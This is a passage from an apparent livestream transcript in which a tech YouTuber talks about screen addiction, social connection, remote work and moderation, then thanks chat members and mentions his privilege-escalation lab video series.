redneck has learned this in his life, that there are things that we find to be mundane that are actually the things that make life worth living. How about that? Who thought that who's got that on their bingo card? Right? Who's got that on their bingo card? Nobody. Who would have thought that? Like, because here's what happens. You get on this piece of crap right here, and the whole world looks amazing because it's a curated ball of lies. That's all that is. It's just a curated ball of lies, makes you feel like your life sucks if you're not living that life. Right? There's the sign language for it. Bull, and you can figure out the rest. Right? Because that's exactly what it is. Right? So I'll bring you chat in here. Come on, chat. Right? Because you say having to deal with the self-checkout, baby. No, wrong. Get rid of that crap, man. Give somebody a job. Why do you think people are struggling right now? They don't have work that gives them listen, I have worked many a different job and a variety of different like levels of status in society. All right. And here's what I found out. It's like, no matter what you're doing, you make the best of it and you can have fun with it. You make friends at work and you're struggling together if your job sucks. You've got that in common. It's a way you get to connect. That's how life is, right? I was talking about going out and listening to music. Go to the bar. What happened to going to the bar for you English speakers out there, your pub? Find you a local haunt. Get out there. Go there 2-3 times a week. Know the locals. Know the people that are there. Make some friends. Go there, have a beer too, or a non-alcoholic beverage if that's your choice. No one cares. The fact that you're there hanging out. You couldn't make a show like Cheers today. No one goes to the stinking... They sit in their house and they're just... Right? Listen, I love technology as much as the next person. I am the tech neck, as it were. Love it. Absolutely love it. But I have recognized the fact that it kind of steals my soul if I let it. And it will do the same to you. It will give you a life that all you do look back is go, I spent my life staring at a screen instead of going out there and making memories of something real, talking to people. Like my kids, I take my kids, we still, God bless America, I still have a mall. It ain't packed with people like it once was, but there's enough people there, and we go, and my kids, they play with toys at a store, and we look at things, and we handle stuff, and it's an experience, and it's something they look forward to, and therefore I look forward to it. Right? That is, yeah, I use a keyboard. All right, clickety-clackety, clickety-clackety. Right? And those are real memories that my kids are making of something real they did instead of just going buy now on the old Amazon box. Right? There is a time and place for that, but we've become too convenient. I think that our lives are too convenient. I feel like a little bit of getting them back out there and connecting with the people in my community is a good thing. Right? I started to get to know people that work at CVS because I make a point to go, or wherever, my local grocery store, whatever the heck. When did TechNet get more serious? Man, we just kind of fell down this rabbit hole, Jay Gold. I don't know how we got here, but we sure as heck did. I just, it was the last thing. I wanted to make sure we talked about this before I left. Speaking of which, winding down. Phil Stafford says, my kids run headless now, and I communicate with them over Discord and SMS. You know, that's crazy. Start by eliminating work from home jobs, Brian Bauer says. Yeah, I mean, I don't know if eliminating it is the way to go. It's finding the equilibrium, right? It's fine. We tend to think that if we like something, you pour jet fuel on it and go more better, right? Let me give you an analogy on that, because this is how it can go wrong. If more equals better, then I'm a little stoved up. You know, I haven't had enough fiber in my diet, a little too much red meat. I'm going to take a laxative. Oh, that works really well. More is better, right? No, more is not better. The right amount is better. You see how things, and that's what ends up happening. So if we get a bunch of remote work, everybody's in a remote job, no one's connecting. There's difficulty connecting within the job. You're just another number in the system, right? I've seen this go awry. No one's checking in on you. You're just kind of living by yourself. You don't know whether you're doing good or bad or whatever. You're just doing what you think is right because no one says anything. You don't have that interaction. So, right. Casually Joseph, you nailed it, sir. Right there. Everything in moderation. Find that right sweet spot for everything. Don't think that because it's hard, it's bad. Right? Think about it. Think about the hard things you've done in life that made you better, that pushed you, that you grew beyond where you were at the time you encountered that difficult thing. Super User Deuce says, my wife is Korean and never had prunes before. She moved to the States. She loves them, and I was not a great husband. Oh, you horrible, horrible man, you. Oh, that is funny. Oh, let's see here. We had a guy on LinkedIn. This comes from Phil Stafford, crowing about how his company spies on work-from-home workers to catch employees fraud, by which he meant second jobs. We dunked on him so hard. Right. We have addictive personalities. Moderation is difficult for a lot of us. And that's why I'm letting you know. Prunes are amazing. A lot of prunes are not so amazing. Right? Remember that. Try to keep that mantra going. Don't forget, man, that we don't want to lose all the things that made things great, that made things awesome and fun, that made us look back at our childhood and our parents' childhood and things that we go, man, I wish we had a bit of that. I wish they hadn't lost that too. And still looking forward to the future on how can we innovate and be creative and do new things that are going to be just as cool. This was fun, guys. I hope you had a great day today. Hope you have a wonderful weekend. There will be no After Dark this coming week because it is the day before Turkey Day, and I will not be available to do it. So there's that. Just keep that in mind. If you are wanting to see more of what goes on with old Daniel Boy, guess what? I got a video drop today. It is the part 3 of DC3, the privilege escalation. Last one on that, and then we'll move into DC4 as soon as I get it downloaded and start working on it. Maybe I'll use AI for that. Maybe I'll try to see what AI can do for that. Thank you all for joining me today. Thank you, Keith Sloan, because he said thank you. I'm going to say thank you right back. If you enjoyed this episode, you know what to do. Hit that like and subscribe. Don't forget me. I'm trying to grow the channel just a little bit and get a bigger reach because I feel like more people need this kind of thing. Myself included. And I really enjoy everybody that shows up every week and hangs out with us. Thank you, Phil Stafford. Thank you, Space Tacos, Alicia Grimm, Wayne's Real World, Brian Bauer, Carrie, Super User Duke, Brews and Hacks, Code Brew, Tech Grunt, Tech Ricky. I didn't see him there today, but Tyler Ramsey was in the house. Really enjoy everybody that hangs out with us today. We're just having conversation, just trying to figure things out. And that's what this channel is all about. So hope you enjoyed it. Until next time, keep hacking.